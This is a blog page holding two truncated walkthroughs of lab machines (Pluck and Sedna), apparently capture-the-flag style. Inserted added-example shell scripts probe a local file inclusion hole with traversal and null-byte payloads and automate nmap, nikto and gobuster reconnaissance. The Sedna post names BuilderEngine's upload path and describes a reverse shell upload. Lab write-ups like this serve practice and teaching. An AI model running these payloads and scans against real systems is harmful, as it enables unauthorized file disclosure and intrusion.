Posts

Showing posts from March, 2017

Pluck w00t!

Time to Pluck!

Though a bit late, I decided to give this machine a try!

As with almost every machine, I began with arp-scan/netdiscover:


Once this was done, the next step was a port scan of the host.

I began with the TCP scan while the slower UDP scan ran in the background.
Since port 80 was open, I ran nikto in another window.


After this was done, I moved on to checking the banners on each service.

SSH didn't give any banner, and neither did MySQL or LLMNR, so I moved on to enumerating the web service.

Just before I went to check the web service, I looked at the nikto results and they were interesting!


Now this was very interesting: an LFI!

Meanwhile, I had also tried fuzzing the admin page on the web service, and it revealed SQL injection:


Now I had two vectors, so I thought, let's begin with the LFI.

Requesting /etc/passwd dumped all of its contents!


But trying the LFI on other files, like the Apache logs, wasn't working (permission issue??)
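The LFI probing described above, as an added example script that is not part of the original post. The URL and parameter name are whatever nikto reported (the post does not name them, so they are passed in as arguments here); the script generates traversal payloads with and without a trailing %00, fetches each one, and checks for the root entry of /etc/passwd rather than trusting any non-empty reply. It also records the usual reason the Apache logs do not read through an LFI on Ubuntu: /var/log/apache2 is root:adm 0750, so the web server's own user cannot include them.

```shell
#!/bin/sh
# Added example (not from the post): traversal payloads for a suspected LFI
# parameter and a check that tells a leaked /etc/passwd from an error page.
# Usage: sh lfi.sh 'http://TARGET/vulnerable.php' PARAM
# (URL and parameter name are assumptions: use the ones nikto reported)
set -u

# Emit "../"-prefixed candidates for $1 up to depth $2, each once plain and once
# with a trailing %00. The null byte only helps when the include appends a suffix
# and PHP is older than 5.3.4; it costs nothing to try on an unknown target.
lfi_payloads() {
  file=$1; depth=${2:-8}
  i=1; prefix=""
  while [ "$i" -le "$depth" ]; do
    prefix="${prefix}../"
    printf '%s%s\n' "$prefix" "$file"
    printf '%s%s%%00\n' "$prefix" "$file"
    i=$((i + 1))
  done
}

# /etc/passwd always begins with the root entry: user, password field, uid 0, gid 0.
# Matching that line avoids false positives from pages that merely echo the payload.
looks_like_passwd() {
  grep -q '^root:[^:]*:0:0:'
}

# Try every candidate and stop at the first one that returns a real passwd file.
# The payload goes straight into the query string so the %00 reaches the server
# as a null byte instead of being re-encoded to %2500 by --data-urlencode.
probe_lfi() {
  url=$1; param=$2
  for payload in $(lfi_payloads etc/passwd); do
    if curl -s -m 10 "${url}?${param}=${payload}" | looks_like_passwd; then
      echo "LFI confirmed: ${url}?${param}=${payload}"
      return 0
    fi
  done
  echo "no passwd leak with these payloads" >&2
  return 1
}

# When /etc/passwd reads but the Apache logs do not: on Ubuntu /var/log/apache2 is
# root:adm 0750, so the web server's own user cannot include them and log
# poisoning is off the table. Files the www-data user can usually read instead:
#   proc/self/environ   proc/self/cmdline   etc/hostname   etc/apache2/apache2.conf

if [ "$#" -ge 2 ]; then
  probe_lfi "$1" "$2"
fi
```

Run it with the vulnerable URL and parameter as the two arguments; the functions can also be sourced individually, which is how the payload list can be fed to a fuzzer instead.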

This was when something caught my eye....  There was an entr…
I picked up Sedna and these were the steps:

As with any machine, I started with arp-scan to find the machine's IP:

arp-scan -l



The machine got detected at 192.168.137.152

The next step was to run an nmap scan:



From here, I decided to concentrate on port 80.
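Both write-ups on this page open with the same routine: arp-scan for the IP, a TCP scan with the slow UDP scan in the background, then nikto (and, in the Sedna post, robots.txt and gobuster) against the web port and banner checks on everything else. Here it is as one added example script, not code from either post. It takes the IP arp-scan found as its argument; the nmap flags, wordlist path and output file names are my choices, not the posts'.

```shell
#!/bin/sh
# Added example (not from the posts): the host discovery / port scan / service
# enumeration routine the two write-ups describe, as one script.
# Usage: sh recon.sh 192.168.137.152   (the address arp-scan -l reported)
set -u

# Turn nmap greppable output (-oG) into "port/proto service" lines, open ports
# only. In that format the Ports: field is a comma-separated list of
# port/state/proto/owner/service/rpcinfo/version/ entries, tab-separated from
# the other fields on the Host: line.
open_ports() {
  awk '/Ports:/ {
    split($0, a, "Ports: "); split(a[2], b, "\t");
    n = split(b[1], p, ", ");
    for (i = 1; i <= n; i++) {
      split(p[i], f, "/");
      if (f[2] == "open") print f[1] "/" f[3] " " f[5]
    }
  }' "$1"
}

# Port numbers of open TCP services nmap identified as HTTP (plain or ssl|http).
http_ports() {
  open_ports "$1" | awk '$1 ~ /\/tcp$/ && $2 ~ /http/ { sub(/\/tcp$/, "", $1); print $1 }'
}

# Grab a banner from a non-HTTP service: send CRLF, read whatever comes back.
banner() {
  printf '\r\n' | nc -w 3 "$1" "$2" | head -c 256
}

recon() {
  target=$1
  # Full TCP port scan with version detection first; the slow UDP scan runs in
  # the background, as in the write-ups.
  nmap -sS -sV -p- -oG "tcp_$target.gnmap" "$target" >/dev/null
  nmap -sU --top-ports 50 -oG "udp_$target.gnmap" "$target" >/dev/null &
  echo "open TCP ports on $target:"
  open_ports "tcp_$target.gnmap"
  # Every HTTP service gets robots.txt, nikto and gobuster (the last two in parallel).
  for port in $(http_ports "tcp_$target.gnmap"); do
    echo "--- robots.txt on :$port"
    curl -s -m 5 "http://$target:$port/robots.txt"
    nikto -h "http://$target:$port" -o "nikto_$port.txt" >/dev/null &
    gobuster dir -u "http://$target:$port" -w /usr/share/wordlists/dirb/common.txt \
      -o "gobuster_$port.txt" >/dev/null &
  done
  # Everything else gets a banner grab.
  open_ports "tcp_$target.gnmap" | awk '$2 !~ /http/' | while read -r portproto svc; do
    echo "--- banner on $portproto ($svc)"
    banner "$target" "${portproto%/*}"
  done
  wait   # for the UDP scan, nikto and gobuster
}

if [ "$#" -ge 1 ]; then
  recon "$1"
fi
```

The greppable parser is the piece worth keeping: it turns the scan into a list other tools can consume, so the nikto/gobuster fan-out is driven by what nmap actually found rather than by a hard-coded port 80.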

First checking the webpage:


I decided to have a peek at robots.txt as well:


Going to /Hackers gave 404 Not Found! Damn! :D

Meanwhile, in the background, I was running gobuster.

Doing web enumeration and checking the web page sources didn't reveal much!
I decided to check my gobuster results:


Manually enumerating the folders dirbuster pointed to, it quickly became clear that BuilderEngine was running.

Next, searchsploit revealed an arbitrary file upload exploit for BuilderEngine.


It seems BuilderEngine is vulnerable to arbitrary file upload via the directory:
http://IP_Addr/themes/dashboard/assets/plugins/jquery-file-upload/server/php/

I uploaded a simple PHP reverse shell and received a reverse shell on my listener on port 443.



And I…